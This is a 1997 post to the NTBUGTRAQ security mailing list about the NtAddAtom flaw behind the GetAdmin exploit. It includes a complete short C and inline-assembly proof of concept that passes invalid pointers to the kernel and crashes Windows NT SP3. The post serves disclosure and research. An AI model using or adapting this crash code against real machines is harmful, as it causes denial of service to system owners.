>From craiu@GECAD.RO Wed Aug  6 04:17:35 1997
Date: Tue, 8 Jul 1997 19:51:06 +0300
From: Costin RAIU 
To: NTBUGTRAQ@RC.ON.CA
Subject: Re: [NTSEC] GetAdmin - Technical Background

Todd wrote:
> >This logic is missing in NtAddAtom.  From the looks of things, it's also
> >missing from NtFindAtom.  This is really a variation on the theme of NtCrash.
> > It's a little surprising that Microsoft didn't fully learn the lesson...

Hi everyone,

Here's a small program able to crash a WindowsNT machine using
the bug in NtAddAtom. Just a variation of NTCRASH.

However I have one question: why does getadmin open ntoskrnl.exe
to find the address of NtAddAtom ? Using EAX=3/INT2F is "portable"
and does not require any +r access to ntoskrnl.exe

NOTE: The location of memory overwritten by the kernel is
stored in the "a" array. In this exploit the kernel does
a write operation to FFFFFFFF - instant crash.
(at least on my machine)

BTW: This program is for academic and learning purposes.
No criminal intention at all.

---------------------------------------------------
/*

A program to bring the BSOD using the bug in NtAddAtom. Works with SP3.
Author: Costin RAIU, 
Compile with VC++

*/

void *a[2];

void main(void){
     int i;
     for (i=0;i<2;i++) a[i]=(void*)(0xffffffffL);

     _asm
        {
        mov eax,3
        mov edx,offset a
        int 02eh
        }

}
----------------------------------------------------
bye,
c0s

Costin RAIU, Data Security Expert

E-MAIL  : BUSINESS mailto:craiu@gecad.ro, PERSONAL craiu@usa.net
PGP Key : http://www.gecad.ro/~craiu/craiu.asc (or search www.pgp.com)
KeyID   : 2048/DD35A295 Costin RAIU 
Key fingerprint = FD 14 2A 90 64 41 58 9A  6B 34 47 D8 C5 E2 F4 5C